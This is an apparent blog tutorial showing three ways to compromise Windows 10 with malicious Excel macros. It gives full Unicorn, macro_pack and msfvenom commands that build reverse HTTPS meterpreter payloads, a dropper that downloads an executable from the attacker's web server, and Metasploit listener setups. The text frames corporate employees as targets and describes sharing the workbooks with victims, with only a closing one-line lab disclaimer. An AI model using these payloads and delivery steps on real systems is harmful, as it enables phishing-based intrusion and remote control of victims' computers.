Multiple Ways to Exploit Windows 10 using Macros

Hey Folks, as we promised you in our previous article, we will bring you an article, in which we will discuss various methods or tools for exploiting windows machine by creating macro payload. The time has come and this tutorial can also be helpful for corporate employees because we know how tight security is in companies and this is the only way left to exploit the machines in corporate environment.

Lets’ take a look 🙂 !!

Before watching our first magic trick you need to know about macros and their work which will only help to get an idea about the whole demonstration and for which you have to go here.

Unicorn Tool

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Usage is simple, magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system. So let’s fire up the kali linux and install this tool. First we clone the repository from the destination using the git command and then go inside the directory of this tool. Just now we are ready to take advantage of this tool using the python tool. All you have to do is change the localhost address and execute the command.

Usage 😛 !! python unicorn.py < payload > < localhost addr > < lport >

git clone https://github.com/trustedsec/unicorn.git
cd unicorn/
python unicorn.py windows/meterpreter/reverse_https 192.168.1.13 4444 macro

Done 😛 !! After executing the command the macro payload will be created successfully and the output you will get as highlighted in below image. Now you can open the content of macro payload by using the cat command.

Let’s move on the target machine and follow these steps. Boot Excel Software -> write any content in empty columns -> go to the “view” tab -> click on macros and select its sub menu option “view macros“.

Enter your preferred name and click on the “enter” button.

Hmm 🙂 !! Copy the contents of the malicious macro payload from inside the “Powerhell_attack.txt” file that was created earlier and paste it here. After that press “CTRL + S” keys simultaneously at the same time to save the document and select the type of documents to “Excel Macro-enabled Workbook“.

We need to set the multi handler to capture the meterpreter session of the target machine. Simply execute the command by modifying it.
use multi/handler

set payload windows/meterpreter/reverse_https
set lhost 192.168.1.13
set lport 4444
run

All work is done, now as soon as we open malicious excel on the target machine and we get a security warning on the excel workbook. To complete this attack, the victim have to click on the “Enable” option.

Opps 🙂 !! After clicking the button, another error will appear on the excel workbook but in fact the attacker will get the meterpreter session of the target machine.

Wonderful :O !! As you can see how easily we have got the meterpreter session of the target machine without any doubt.

Macro Pack

The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats. We have to install Apache web server to keep our malicious exe file. To install the apache web server follow the given command.

apt install apache2

Go to the root folder of the web server and create the payload using the metasploit framework.

cd /var/www/html/
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.13 lport=4444 -f exe >> malicious.exe

Let’s departure to the target machine and download the tool from github.

echo "http://192.168.1.13/malicious.exe" "dropped.exe" | .\macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Great Job 🙂 !! If all is well, the VBA script will be successfully injected into the Excel document otherwise an error will be shown.

Great 😛 !! Just go back to the place where the tool was saved, where you will find another Excel file created by the tool. Open that file by double click on it.

We receive the same security warning that we received after the payload was made by the Unicorn tool, which means the payload has been create by this tool.

Done 😛 !! As soon as the victim enables that security warning, we get that user’s meterpreter session.

use multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.13
set lport 4444
run

Metasploit

Now we will try the same thing with an pre-installed tool called “msfvenom“. In order to create macro payload or VBA script, you need to follow the given command. After executing the command, let the terminal remain as it is and go to the target machine.

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.13 lport=4444 -f vba

Take a blank document and follow the same steps we did above.

After pasting the previously created VBA script on here, saved the file by press both “CTRL + S” keys simultaneously at the same time.

Ready 😛 !! Now you can share this file through various tools or online plateform. When victim open the excel workbook file then a security warning will be appear.

Nice 😛 !! And the meterpreter session comes to us as soon as the victim enables the macro option.

use multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.13
set lport 4444
run

Note : We have done all these demonstrations in lab environment.